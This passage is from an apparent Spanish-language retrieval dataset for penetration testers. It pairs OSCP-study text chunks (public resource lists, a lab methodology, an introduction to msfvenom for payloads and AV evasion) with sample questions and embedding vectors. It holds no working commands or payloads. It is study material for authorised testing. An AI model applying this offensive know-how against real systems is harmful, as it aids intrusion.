0.05077, -0.03388, -0.09424, 0.08321, 0.04658, -0.0085, 0.04193, -0.08418, -0.03096, -0.06197, 0.03912, 0.0753, -0.04436, -0.13454, 0.00503, 0.0278, 0.05907, -0.04318, -0.00068, -0.0694, 0.02087, -0.04221, 0.02623, 0.03636, -0.00952, 0.0065, -0.0186, 0.00797, -0.09633, 0.00161, -0.03556, -0.0302, 0.00815, 0.01394, 0.0204, 0.04108, 0.0135, -0.02749, 0.04725, -0.00168, 0.03854, -0.0102, 0.03841, 0.00995, 0.00311, 0.02327, 0.02361, 0.01166, 0.05979, -0.04143, 0.00901, 0.00954, -0.02972, -0.04613, -0.02264, -0.03401, 0.04661, -0.07827, 0.01715, 0.02399, 0.05527, -0.02301, -0.01636, -0.07679, 0.04553, 0.00389, -0.00872, 0.00116, 0.01585, -0.03585, -0.10879, 0.01318, -0.07176, -0.00596, 0.01333, 0.11939, -0.01362, -0.07205, -0.03999, 0.03295, 0.01486, 0.01094, -0.00928, -0.03583, -0.03125, -0.01424, -0.01608, -0.00602, -0.06665, 0.00596, -0.01852, -0.03749, -0.01326, 0.00043, -0.03041, 0.00863, 0.02906, 0.02762, 0.01093, -0.01361, 0.00238, 0.01133, -0.01583, -0.02661, -0.00073, -0.05959, 0.03235, 0.00175, -0.01634, -0.03376, -0.00888, -0.00052, 0.00653, -0.02046, -0.03956, -0.00397, -0.00416, -0.04957, -0.00518, -0.04719, -0.00694, 0.0123, 0.01442, -0.03186, 0.04203, 0.01225]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Recursos pΓΊblicos donde sΓ­ estΓ‘ todo esto\n\n| Recurso | Por quΓ© importa |\n|---|---|\n| **TJ Null's OSCP-like list** (en Reddit) | Lista actualizada de mΓ‘quinas HTB/THM equivalentes a OSCP |\n| **ippsec.rocks** | Buscador de writeups por tΓ©cnica (\"kerberoasting\" β†’ te lista todas las mΓ‘quinas HTB donde aparece) |\n| **0xdf.gitlab.io** | Writeups detalladΓ­simos con explicaciΓ³n pedagΓ³gica |\n| **PayloadsAllTheThings** | Cheatsheet de todo lo web |\n| **HackTricks (book.hacktricks.xyz)** | La biblia. Lo busques lo que busques estΓ‘ ahΓ­ |\n| **GTFOBins / LOLBAS** | Para privesc Linux y LOLBins Windows |\n| **/r/oscp** | Subreddit con experiencias de examinados (sin spoilers) |\n| **Discord pΓΊblicos**: HTB, TryHackMe, NetSecFocus | Comunidades activas que SÍ puedes consultar |\n\n---", "indexar": "con que puedo encontrar una lista de mΓ‘quinas tipo OSCP actualizada en Reddit?", "v": [-0.03975, 0.07951, -0.0524, -0.06879, -0.00424, -0.17903, -0.09696, 0.04816, -0.07232, -0.08183, -0.10484, -0.18912, 0.0351, -0.10884, 0.06307, -0.02709, -0.07416, 0.0527, 0.06929, -0.04581, 0.00393, -0.09441, -0.10581, 0.02028, 0.08427, 0.11144, 0.0925, -0.04475, -0.24652, -0.01072, 0.04193, 0.00016, -0.07235, 0.05283, -0.12189, -0.07749, 0.05118, 0.03016, -0.02666, 0.03398, -0.03111, 0.04996, -0.06493, 0.07958, 0.1482, 0.00432, -0.01267, 0.0767, -0.05537, -0.03466, -0.08834, -0.0941, -0.13846, 0.02028, -0.02352, -0.12004, 0.09008, 0.00174, 0.07876, 0.00963, -0.09083, 0.12174, -0.17042, -0.04115, -0.10569, 0.07102, -0.00115, 0.00146, -0.00712, 0.01289, -0.06415, 0.05385, -0.03013, -0.04926, 0.07173, -0.02355, 0.05036, -0.00331, 0.07066, 0.03589, 0.0008, -0.08713, 0.05434, 0.09088, -0.04839, -0.12599, 0.09133, -0.00754, -0.04033, -0.11979, 0.01112, 0.06185, 0.02558, 0.04129, 0.09778, -0.04255, 0.07654, 0.02651, 0.04877, -0.03329, -0.01703, 0.01325, 0.00795, 0.05622, -0.11011, 0.05943, 0.13019, -0.03604, 0.06004, -0.07529, 0.07085, -0.01622, -0.03128, 0.04301, -0.10587, -0.01193, -0.12834, -0.00601, 0.05797, -0.02114, -0.07591, 0.04087, -0.01499, 0.01884, 0.04269, 0.03124, -0.02085, 0.0729, 0.01763, -0.06223, 0.00088, -0.02283, -0.08, -0.08315, -0.07935, -0.00967, 0.01467, -0.0087, -0.03063, -0.07459, 0.07731, 0.07186, 0.03034, -0.09085, -0.05897, -0.07262, 0.04855, -0.11131, -0.04587, -0.01205, 0.01585, 0.02843, 0.05446, 0.08443, 0.01072, 0.08709, 0.01486, -0.0423, 0.03113, 0.04783, -0.00731, -0.04671, -0.05888, -0.01047, -0.06685, 0.10341, -0.02336, 0.0459, 0.01993, -0.05685, -0.01155, 0.09015, 0.01522, 0.03575, -0.0244, -0.05065, 0.03002, -0.00225, 0.02873, 0.04637, -0.08799, 0.03906, -0.01677, -0.04418, 0.00711, -0.03109, 0.04297, -0.06474, 0.0225, 0.01284, 0.03738, 0.01202, 0.01801, -0.02843, 0.00157, -0.0313, 0.0544, 0.06489, -0.02604, -0.06912, -0.09382, -0.05277, -0.06201, -0.0326, -0.02391, 0.03533, -0.01752, -0.00567, -0.03024, -0.04694, 0.00344, 0.00173, 0.05291, -0.02993, 0.00481, 0.0002, 0.05705, -0.02585, -0.02406, -0.02704, 0.0125, -0.01322, 0.06606, -0.0268, -0.008, -0.01979, 0.06019, 0.03978, 0.07078, 0.04652, -0.00164, 0.07639, 0.07039, -0.08437, 0.04487, 0.0764, 0.00568, -0.01051, -0.09729, -0.05501, 0.01628, 0.02551, -0.00357, -0.03422, -0.04363, -0.06673, -0.02185, -0.03988, 0.0062, -0.07261, -0.04972, 0.02485, 0.04147, -0.08747, 0.07361, 0.01457]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Recursos pΓΊblicos donde sΓ­ estΓ‘ todo esto\n\n| Recurso | Por quΓ© importa |\n|---|---|\n| **TJ Null's OSCP-like list** (en Reddit) | Lista actualizada de mΓ‘quinas HTB/THM equivalentes a OSCP |\n| **ippsec.rocks** | Buscador de writeups por tΓ©cnica (\"kerberoasting\" β†’ te lista todas las mΓ‘quinas HTB donde aparece) |\n| **0xdf.gitlab.io** | Writeups detalladΓ­simos con explicaciΓ³n pedagΓ³gica |\n| **PayloadsAllTheThings** | Cheatsheet de todo lo web |\n| **HackTricks (book.hacktricks.xyz)** | La biblia. Lo busques lo que busques estΓ‘ ahΓ­ |\n| **GTFOBins / LOLBAS** | Para privesc Linux y LOLBins Windows |\n| **/r/oscp** | Subreddit con experiencias de examinados (sin spoilers) |\n| **Discord pΓΊblicos**: HTB, TryHackMe, NetSecFocus | Comunidades activas que SÍ puedes consultar |\n\n---", "indexar": "cual es la mejor biblia para aprender todos los ataques web", "v": [-0.02701, 0.01322, -0.0071, -0.03292, -0.03351, -0.14287, 0.02735, 0.01274, 0.00352, -0.08699, 0.00993, -0.0681, -0.06208, 0.05113, 0.01281, -0.01213, 0.05859, -0.01351, 0.14429, -0.12084, 0.13672, 0.03569, -0.05876, 0.06055, -0.03548, -0.1375, -0.05573, 0.03837, -0.04774, 0.14395, -0.08496, -0.03793, 0.02355, -0.00092, -0.05881, 0.0806, -0.02571, 0.13588, -0.0076, 0.04018, -0.10148, 0.01143, -0.08909, -0.01144, 0.01734, 0.02512, 0.01745, -0.0615, -0.06244, -0.05029, 0.02589, 0.10244, -0.05917, -0.10049, -0.07844, -0.04185, 0.07684, -0.18036, 0.07489, -0.05681, -0.17825, -0.03976, -0.05582, -0.19653, 0.07375, -0.0645, -0.03282, 0.05377, -0.12538, 0.07912, 0.03337, -0.01348, -0.05948, -0.00052, -0.03859, 0.03112, 0.03298, 0.09228, 0.09738, -0.13162, -0.02334, -0.04413, -0.09014, -0.0554, -0.11305, 0.05276, -0.04717, -0.00113, 0.01783, -0.05777, 0.00121, 0.07204, -0.12031, -0.09503, 0.0658, -0.07858, -0.003, -0.10544, 0.00141, -0.02182, 0.00783, -0.15162, -0.03425, 0.09393, -0.00619, 0.10587, -0.02122, -0.00535, -0.10472, -0.13727, -0.04834, -0.02434, -0.09743, -0.02909, 0.0187, -0.02967, -0.04772, 0.01868, -0.04226, -0.04714, -0.1266, 0.01665, -0.04725, 0.03987, 0.03898, 0.12594, 0.07495, 0.03441, -0.00121, -0.07158, -0.00964, -0.07508, -0.00684, 0.0193, -0.0603, 0.0086, 0.04452, -0.03711, -0.04218, -0.02366, 0.05786, 0.04863, -0.08284, 0.00786, 0.00975, 0.02729, 0.04656, -0.00778, -0.04387, -0.04083, -0.07657, 0.06229, 0.10436, 0.01276, -0.0255, 0.01181, -0.03091, -0.05556, -0.0017, 0.06543, 0.01524, 0.05485, 0.04178, -0.07063, -0.02305, -0.01731, -0.10209, 0.08418, 0.06558, 0.02346, 0.00566, 0.11724, 0.00421, -0.1013, 0.0001, -0.04799, -0.04371, -0.07083, -0.02441, -0.02034, -0.06941, -0.0915, -0.0603, 0.03434, -0.01216, -0.03618, 0.02571, 0.00951, -0.01529, 0.02702, 0.0094, -0.00296, -0.06663, -0.04556, 0.01779, -0.02824, -0.06184, -0.05498, 0.01681, 0.02151, -0.02779, -0.06691, -0.09553, -0.04749, 0.07078, 0.0715, 0.01489, -0.06312, -0.00382, 0.02413, 0.05849, 0.00487, 0.049, -0.09404, -0.07339, -0.07763, 0.0308, 0.00097, -0.03192, 0.01126, 0.12311, -0.01482, 0.04446, -0.01149, -0.01532, -0.04784, -0.03761, -0.03927, 0.04766, 0.04893, -0.0434, -0.05931, -0.02186, -0.06139, 0.00723, 0.01596, 0.03042, 0.02693, -0.08078, -0.08741, -0.03754, 0.01555, 0.03331, -0.02072, -0.01582, -0.04755, -0.06449, -0.00623, -0.02811, -0.03191, -0.04609, -0.07637, 0.02737, 0.03554, 0.0537, 0.02907]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Truco meta de meta-trucos\n\nEl truco real del OSCP no es saber 200 tΓ©cnicas. Es **tener una metodologΓ­a repetible**:\n\n```\nEnumeraciΓ³n exhaustiva β†’ vector β†’ foothold β†’\nPrivEsc con script automatizado + revisiΓ³n manual β†’\ndocumentar antes de pasar a siguiente mΓ‘quina\n```\n\nLa gente suspende por **saltarse pasos** o por **obsesionarse con un vector**, no por desconocimiento tΓ©cnico.", "indexar": "que metodologΓ­a puedo seguir para realizar una enumeraciΓ³n exhaustiva y escalar en un laboratorio?", "v": [0.17602, 0.02681, -0.30674, -0.09058, -0.00891, -0.01195, 0.00827, 0.06172, -0.07943, -0.15105, -0.08596, -0.01942, 0.08438, 0.00743, 0.11495, 0.04274, 0.04068, -0.0888, -0.0956, 0.05959, -0.0182, -0.00497, -0.11327, 0.00857, 0.06368, 0.03685, -0.02737, -0.05824, -0.01843, 0.00989, -0.04168, 0.20072, 0.02423, -0.08319, 0.05241, -0.00312, -0.01721, -0.03895, -0.04349, 0.01632, -0.1156, 0.00176, -0.0409, -0.11188, 0.00365, -0.01472, -0.01584, 0.02926, -0.03032, 0.00476, -0.03698, 0.04311, 0.03659, -0.05678, -0.10389, 0.01103, 0.12882, -0.03515, 0.09753, -0.08578, 0.02533, -0.00798, 0.04379, -0.01508, -0.00533, 0.02158, -0.06459, -0.08439, -0.08243, 0.09155, -0.05894, -0.00819, 0.0133, -0.01666, -0.00932, 0.01736, -0.00937, -0.00908, 0.09831, -0.00542, -0.03344, 0.00737, -0.03565, 0.04171, -0.09775, -0.04055, 0.15413, -0.0288, 0.03979, -0.03454, -0.09134, -0.08501, -0.0699, -0.08698, -0.00213, -0.0302, 0.10237, 0.00653, 0.03114, 0.03339, 0.00394, -0.00529, -0.05757, 0.12868, -0.00378, 0.06798, 0.01909, -0.01914, -0.051, -0.05767, 0.02437, -0.01123, -0.02597, -0.04847, -0.21587, -0.05764, -0.04824, 0.00281, -0.10326, -0.05826, -0.06659, -0.01999, -0.04534, -0.01502, -0.02941, -0.13468, 0.00888, 0.06777, 0.06777, -0.03206, -0.02778, 0.07788, 0.02059, 0.04189, 0.03854, 0.0528, 0.02996, -0.00505, 0.05183, -0.04126, 0.05465, 0.04898, -0.03431, -0.09367, 0.06723, -0.04399, -0.06332, -0.12798, -0.07356, -0.04772, -0.05162, 0.03752, 0.01588, 0.11568, -0.06078, -0.08258, 0.12582, -0.04312, -0.0521, 0.11784, -0.05275, 0.04956, -0.02001, 0.01258, 0.01158, 0.04087, 0.0494, -0.06617, -0.04247, -0.02263, -0.00875, -0.00348, -0.05956, -0.07872, 0.09478, 0.00886, -0.05141, -0.07952, 0.07236, -0.02524, -0.08698, 0.03757, 0.02122, -0.11488, 0.00622, -0.0072, 0.04681, -0.0376, 0.02511, 0.07347, -0.0018, 0.00495, -0.05211, -0.06944, -0.0178, -0.03332, 0.06707, 0.03063, 0.01377, 0.0027, 0.00319, 0.03067, -0.06975, -0.03314, -0.00321, -0.00221, -0.07414, 0.02728, -0.04458, 0.02252, 0.07727, -0.01182, 0.06247, -0.05948, -0.04907, -0.01636, 0.01999, -0.00655, -0.06793, -0.00971, 0.00844, 0.07856, 0.06674, -0.0122, -0.03064, 0.07806, -0.01838, 0.03103, -0.00408, 0.03699, -0.06828, 0.01298, 0.00927, -0.01395, 0.06557, 0.07182, 0.05451, -0.00085, -0.03913, -0.04789, 0.03194, 0.08381, -0.02799, 0.00017, -0.05221, -0.0787, -0.05645, 0.05663, 0.08698, -0.06475, -0.00329, -0.01616, 0.01939, -0.00934, 0.06397, -0.06054]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Truco meta de meta-trucos\n\nEl truco real del OSCP no es saber 200 tΓ©cnicas. Es **tener una metodologΓ­a repetible**:\n\n```\nEnumeraciΓ³n exhaustiva β†’ vector β†’ foothold β†’\nPrivEsc con script automatizado + revisiΓ³n manual β†’\ndocumentar antes de pasar a siguiente mΓ‘quina\n```\n\nLa gente suspende por **saltarse pasos** o por **obsesionarse con un vector**, no por desconocimiento tΓ©cnico.", "indexar": "cual es la mejor forma de automatizar el proceso de aprovechamiento de vulnerabilidades sin olvidar la revisiΓ³n manual?", "v": [0.09656, 0.06332, -0.14512, -0.19118, 0.01912, -0.05895, -0.01715, -0.07336, -0.19442, -0.05297, -0.01063, -0.12394, -0.00531, 0.08446, 0.04739, 0.05823, 0.04719, -0.06982, -0.05106, 0.09884, 0.01802, -0.04881, 0.0223, 0.00915, -0.08628, 0.04949, -0.00234, -0.04235, -0.1576, -0.03024, -0.02238, 0.05819, 0.07398, -0.03678, -0.02071, 0.10547, 0.11595, 0.09268, -0.02977, 0.10802, 0.04775, 0.10161, -0.09863, 0.10885, 0.13863, -0.07506, 0.0165, 0.01018, 0.03494, -0.0217, -0.033, -0.0412, -0.04083, -0.01426, 0.06088, -0.07753, 0.22088, -0.09046, 0.15934, -0.12996, 0.00276, 0.07078, 0.0127, 0.06279, 0.0126, -0.04737, 0.01304, -0.06375, -0.06925, 0.19362, 0.0348, 0.03442, -0.01596, 0.00928, -0.0025, 0.00997, 0.01735, 0.03802, 0.03267, 0.04125, 0.02661, -0.00088, -0.01896, 0.02203, -0.0752, -0.06443, 0.04633, 0.02876, 0.03201, -0.0518, 0.04114, -0.08204, 0.00987, -0.01738, 0.05631, -0.08714, 0.10274, 0.03183, -0.02368, 0.06353, 0.0665, -0.0867, -0.00787, 0.12786, 0.07784, 0.07386, -0.00163, 0.02688, -0.0408, -0.1196, -0.04565, 0.03769, -0.06165, -0.01032, -0.06169, 0.06826, -0.03682, -0.05268, -0.04455, -0.07512, 0.00366, -0.10399, -0.01395, -0.11683, 0.01441, -0.00569, 0.05943, 0.12433, -0.01177, -0.03801, 0.00328, -0.00703, -0.09603, -0.00467, 0.02628, -0.03744, 0.02342, 0.0516, -0.06978, -0.07869, -0.01814, 0.11097, -0.02452, 0.01565, 0.06582, -0.02658, 0.07347, -0.03171, 0.01777, -0.04064, -0.01744, 0.00209, 0.07246, 0.00023, -0.04331, -0.0021, -0.07075, -0.04862, 0.00702, 0.05091, 0.01717, 0.03796, -0.0062, 0.03894, 0.0343, 0.06201, 0.02432, 0.05578, 0.06295, -0.05747, 0.0731, -0.01526, -0.01721, 0.04288, 0.00168, -0.05508, 0.01447, 0.01057, 0.04109, -0.00105, -0.01931, -0.00864, -0.0626, -0.01218, 0.02132, -0.01592, 0.03703, -0.05032, 0.09624, 0.00316, 0.01602, -0.04014, -0.05569, 0.02068, 0.09543, -0.03274, -0.04546, 0.02401, 0.01056, -0.0945, -0.09852, -0.03284, -0.01981, -0.00903, 0.06363, 0.12067, 0.00097, 0.01064, -0.03582, 0.04242, 0.01469, -0.02626, 0.11966, -0.05221, -0.0868, -0.06618, -0.02874, -0.01506, -0.0189, -0.04756, 0.05763, -0.03722, 0.0736, -0.00476, -0.04403, -0.04015, 0.06105, 0.0301, 0.02455, -0.02288, -0.08551, 0.05275, -0.04304, -0.02727, 0.02856, 0.03179, 0.02232, -0.07129, 0.00969, -0.0952, 0.09029, 0.0566, -0.01266, -0.07693, -0.06712, -0.0596, -0.05532, 0.00265, 0.00423, -0.06034, -0.01535, 0.03509, 0.02325, -0.03622, 0.01513, -0.10589]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Truco meta de meta-trucos\n\nEl truco real del OSCP no es saber 200 tΓ©cnicas. Es **tener una metodologΓ­a repetible**:\n\n```\nEnumeraciΓ³n exhaustiva β†’ vector β†’ foothold β†’\nPrivEsc con script automatizado + revisiΓ³n manual β†’\ndocumentar antes de pasar a siguiente mΓ‘quina\n```\n\nLa gente suspende por **saltarse pasos** o por **obsesionarse con un vector**, no por desconocimiento tΓ©cnico.", "indexar": "como documentar los pasos seguidos correctamente antes de pasar a otra mΓ‘quina para no cometer errores?", "v": [0.08111, 0.11677, -0.12836, -0.10545, -0.13328, -0.04874, 0.07096, -0.00441, -0.10391, -0.06894, -0.12527, 0.01794, -0.02039, -0.06494, 0.05793, -0.10996, 0.06887, 0.05663, 0.10344, -0.10516, -0.06082, -0.08227, 0.09615, -0.02153, 0.04265, -0.01637, -0.03991, -0.0141, -0.14263, -0.1186, -0.03336, 0.09035, 0.04224, -0.05297, -0.11196, -0.06996, -0.05154, -0.11032, -0.08011, 0.0331, -0.01796, 0.02479, -0.00491, 0.11105, 0.08416, -0.05803, -0.01902, -0.00905, 0.03301, -0.11005, 0.07778, 0.00363, -0.00828, 0.10651, -0.08271, -0.11798, 0.12146, -0.08127, -0.0068, -0.10903, 0.02233, 0.03391, -0.03892, 0.11351, -0.03717, -0.02204, 0.02661, -0.11927, -0.03173, -0.00054, 0.00043, 0.08282, -0.0114, 0.091, -0.03137, -0.0275, 0.07503, -0.03255, 0.00255, 0.05798, 0.02324, -0.07113, -0.01149, -0.02515, -0.05916, -0.00813, 0.06591, 0.03531, 0.02355, -0.14113, 0.04095, 0.10662, 0.00979, -0.0351, 0.13616, -0.01978, 0.07337, -0.04096, -0.04459, 0.13106, 0.07277, -0.02689, -0.04505, 0.03883, -0.04171, 0.12535, 0.03337, -0.03609, -0.12878, -0.06216, -0.09109, -0.00418, -0.08058, -0.06403, -0.04693, 0.02485, -0.00627, -0.03119, -0.16968, 0.04813, 0.02965, -0.05762, -0.09722, -0.10247, 0.02239, -0.01917, 0.02044, 0.12987, 0.05786, -0.01136, 0.05089, 0.08015, -0.02062, 0.05159, 0.05477, 0.06568, 0.06948, -0.05639, -0.06264, -0.13958, 0.09359, -0.00852, -0.05212, 0.02024, 0.02689, 0.01691, -0.00344, -0.09418, -0.07761, 0.02498, -0.08587, 0.02424, 0.06984, -0.01471, 0.04292, 0.00433, 0.04196, -0.07421, 0.00396, 0.01397, -0.04994, -0.04361, -0.04277, -0.00649, 0.04681, 0.01474, -0.04802, 0.07601, 0.03432, -0.07762, -0.00052, 0.01584, 0.00399, -0.06052, 0.07568, -0.02162, -0.0248, -0.03732, 0.05438, -0.05235, -0.02882, 0.05297, 0.01666, 0.0356, 0.01617, -0.01997, 0.01204, -0.00241, 0.07249, 0.08942, 0.02519, 0.00468, -0.03614, -0.02837, -0.00164, 0.01583, 0.00422, 0.0615, 0.09093, 0.01627, -0.06525, 0.02575, -0.04589, 0.0491, 0.04127, 0.0464, -0.0729, 0.03535, -0.0309, 0.00571, -0.0044, -0.03112, 0.05998, -0.10629, -0.10896, -0.03853, 0.01975, 0.06773, -0.10632, -0.00239, 0.0891, 0.01188, 0.0109, -0.02263, -0.02433, 0.01073, 0.09846, 0.00768, -0.03576, 0.03796, -0.06345, 0.04353, -0.04001, -0.0158, 0.01046, 0.05257, 0.07107, -0.00579, -0.05751, -0.01477, 0.08474, 0.05125, -0.00447, -0.02611, 0.04962, 0.04056, -0.05118, 0.06035, 0.04403, -0.04893, 0.04225, 0.00114, 0.01431, -0.0179, 0.01584, -0.07268]} +{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# msfvenom\n\n> El generador de payloads. Lo usas en Buffer Overflow, AV evasion, Client-side attacks, Exploits conocidos y con el handler de Metasploit.", "indexar": "que programa puedo usar para generar payloads", "v": [0.06409, 0.07905, -0.2011, -0.13048, 0.02612, 0.00607, 0.10464, -0.06267, -0.13407, -0.05382, -0.11531, 0.01427, -0.03715, 0.01001, -0.17155, 0.03791, -0.0392, -0.05769, -0.02122, 0.03288, 0.00323, 0.01341, -0.04074, -0.09567, -0.00814, 0.19544, 0.01776, -0.1103, -0.1463, 0.01989, 0.00984, 0.06731, 0.08805, -0.1256, -0.04214, -0.02002, 0.01235, 0.11687, 0.02862, 0.07204, 0.04299, 0.07922, -0.14487, 0.03306, 0.1191, 0.04803, 0.0865, -0.00883, -0.04095, -0.089, 0.04347, 0.03995, -0.05193, 0.05126, 0.03535, -0.10829, 0.07944, -0.15939, -0.10694, 0.05668, -0.01151, 0.10566, 0.02609, -0.02391, -0.04222, -0.07743, 0.0478, 0.0565, -0.11236, -0.03143, -0.00718, 0.01056, 0.03535, 0.03652, 0.04668, 0.04284, -0.0674, -0.00956, 0.06704, 0.08717, -0.022, -0.01086, 0.01396, 0.07286, -0.09618, -0.02239, 0.11105, -0.00984, 0.06314, -0.09033, -0.00911, 0.00957, -0.02316, 0.09605, 0.02581, -0.0538, 0.09826, 0.00238, 0.06915, 0.05446, 0.07765, -0.03916, 0.07011, 0.04496, 0.05291, 0.07258, 0.10969, -0.10499, 0.00557, -0.01799, 0.06764, -0.07966, -0.0216, -0.02332, -0.13651, -0.03682, -0.02033, 0.01516, 0.05642, -0.08637, -0.04682, 0.05679, 0.01366, 0.0204, 0.12484, -0.07162, -0.05461, 0.12482, -0.02598, 0.09639, -0.02329, 0.07137, 0.00683, -0.03507, -0.05811, -0.09278, 0.07603, -0.01799, -0.00218, 0.00942, 0.06778, 0.09343, 0.04221, 0.02019, 0.01258, 0.02469, -0.03507, -0.09356, -0.04319, -0.01489, 0.08781, -0.00304, -0.038, 0.01381, -0.06731, -0.05644, 0.11001, -0.00731, -0.02532, -0.00191, -0.05709, 0.04179, -0.0584, -0.0212, 0.07045, -0.04721, -0.02018, -0.00818, 0.00698, 0.13589, 0.0103, 0.04637, 0.04627, -0.0609, 0.03656, -0.04202, -0.06741, -0.07365, 0.0176, -0.01753, -0.14328, 0.0375, 0.02335, 0.0414, -0.02044, -0.04083, -0.03108, 0.0604, 0.04834, 0.05738, 0.00452, 0.08517, 0.02075, -0.06614, -0.03016, -0.03189, -0.01399, 0.01677, 0.04618, -0.03519, 0.01132, -0.01067, -0.03947, -0.03418, 0.03996, 0.03725, -0.06725, 0.01433, 0.07992, 0.05127, 0.06611, -0.10272, 0.09522, -0.02436, -0.05343, 0.001, -0.0388, 0.01323, 0.03338, 0.06744, 0.00108, 0.0356, 0.03815, 0.02266, 0.00791, -0.00342, 0.05231, 0.01727, 0.0563, 0.01176, -0.01127, 0.02812, -0.02633, -0.02882, 0.05269, -0.00063, 0.00205, -0.01085, -0.05319, -0.03628, 0.01113, 0.05765, -0.05276, -0.07607, -0.01761, -0.00387, -0.03759, 0.04722, -0.00645, 0.00045, -0.01862, 0.09178, 0.0238, -0.03312, 0.05029, 0.04411]} +{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# msfvenom\n\n> El generador de payloads. Lo usas en Buffer Overflow, AV evasion, Client-side attacks, Exploits conocidos y con el handler de Metasploit.", "indexar": "con que herramienta monto exploits conocidos sin necesidad del handler", "v": [0.07668, 0.04145, -0.20739, -0.16139, -0.06844, -0.01237, -0.1365, 0.03943, -0.11091, -0.09964, -0.02014, 0.04635, 0.05978, 0.05362, -0.00724, -0.0166, 0.07717, -0.08926, -0.07524, 0.00325, -0.03837, -0.00558, 0.07044, -0.03291, -0.11913, 0.0297, -0.01966, 0.03033, -0.14239, 0.0678, 0.04116, 0.0505, -0.02123, -0.07015, 0.02282, -0.05822, -0.01195, -0.00809, -0.01277, 0.05114, -0.05715, -0.03006, -0.0974, -0.01008, 0.03842, 9e-05, -0.12651, 0.01856, 0.00266, 0.09338, 0.05282, -0.12991, -0.19221, -0.11322, 0.00444, -0.1685, 0.15546, 0.03486, -0.01178, -0.01134, -0.14311, -0.00053, 0.00025, -0.07889, -0.03134, -0.06496, -0.00427, -0.04824, -0.12627, 0.0697, -0.03839, 0.01405, 0.0225, 0.0928, 0.00047, -0.06374, 0.13369, 0.00864, -0.02524, -0.01471, -0.01414, -0.0357, -0.05502, -0.02711, -0.07456, -0.12038, 0.10956, -0.05396, 0.11638, -0.06777, -0.04788, 0.07758, -0.02537, -0.0917, 0.05382, 0.01551, 0.08469, 0.00582, -0.04088, 0.04952, 0.03858, -0.10244, -0.06054, 0.02963, 0.07964, 0.04623, 0.00243, -0.02381, -0.10038, -0.04687, 0.03914, 0.05498, -0.01184, 0.03861, 0.02362, 0.08321, -0.05972, -0.12472, -0.04447, -0.12158, -0.0179, 0.0292, -0.10159, -0.05119, 0.05382, -0.07954, -0.04224, 0.0707, 0.01568, -0.14916, 0.03668, -0.00194, -0.01419, -0.02604, -0.0016, -0.11796, 0.05104, -0.1188, 0.00741, -0.07145, -0.03827, 0.06199, -0.08731, -0.11506, 0.02304, 0.08107, -0.01235, -0.05522, -0.0535, -0.0097, 0.00128, 0.04062, -0.06426, 0.05803, -0.04769, -0.02896, 0.01587, 0.00936, -0.02347, 0.06018, -0.06801, -0.09736, 0.04973, -0.00112, 0.00441, -0.07199, 0.03373, 0.01443, 0.02358, 0.08352, 0.01878, 0.01737, 0.04945, 0.0429, -0.00983, -0.12095, -0.09099, 0.01719, 0.01838, -0.02185, -0.06621, -0.02206, 0.00687, 0.02742, -0.03224, -0.07447, 0.06897, -0.01475, 0.01912, -0.02483, 0.0158, 0.0014, 0.01994, -0.01876, 0.00361, -0.0119, 0.00346, 0.01056, 0.13326, 0.00613, -0.01345, -0.03005, -0.04077, -0.06339, 0.06463, 0.0487, -0.03049, 0.03161, -0.04261, 0.06111, 0.06812, 0.01734, 0.00528, -0.03449, 0.0331, -0.0351, 0.0273, 0.06337, -0.05087, -0.00372, 0.04201, 0.04348, 0.08464, -0.00023, -0.05328, 0.03046, -0.0178, 0.02619, -0.04939, -0.02841, -0.02185, 0.00189, -0.03792, -0.01803, 0.01567, -0.03865, 0.05097, -0.06848, -0.08283, -0.00763, -0.03383, 0.05434, 0.06014, -0.06314, -0.05359, -0.05723, -0.03226, -0.01191, -0.02703, -0.07638, -0.01628, 0.00024, -0.01651, -0.05755, 0.03675, -0.05886]} +{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# msfvenom\n\n> El generador de payloads. Lo usas en Buffer Overflow, AV evasion, Client-side attacks, Exploits conocidos y con el handler de Metasploit.", "indexar": "cual es una alternativa libre al generador de payloads", "v": [0.15229, 0.01713, -0.07773, 0.0067, -0.04866, 0.05665, 0.08283, -0.02023, -0.18477, -0.01474, -0.08087, -0.09452, -0.05367, 0.09806, 0.00183, 0.0113, -0.06069, -0.06625, 0.01878, 0.04235, -0.09249, 0.06614, -0.0203, -0.14856, 0.01699, 0.05901, -0.03428, -0.0367, -0.19899, 0.08426, 0.04483, 0.04228, 0.06712, -0.0906, -0.02114, 0.03446, 0.08738, 0.1838, 0.06307, -0.0046, -0.00046, -0.01475, -0.13087, 0.09443, 0.03145, -0.04733, 0.0058, 0.01677, 0.04413, -0.00231, -0.02338, 0.08027, -0.05635, 0.06297, 0.05568, -0.03671, 0.19392, -0.15001, -0.07737, 0.01717, -0.05343, 0.13503, 0.03582, -0.08531, -0.05751, -0.031, -0.08287, 0.04362, -0.04984, -0.02697, 0.08227, -0.03765, 0.0227, 0.01668, -0.02328, 0.07434, -0.07074, 0.03049, -0.00901, 0.18002, 0.07653, -0.06498, -0.00818, 0.03329, -0.02791, -0.03719, 0.11971, -0.04368, 0.0478, -0.04655, 0.0257, -0.00191, -0.05243, 0.19506, -0.05294, -0.06514, 0.07899, 0.02294, 0.02785, 0.06574, 0.072, 0.05723, 0.02703, -0.017, 0.11197, 0.01675, 0.03555, -0.06367, 0.00763, 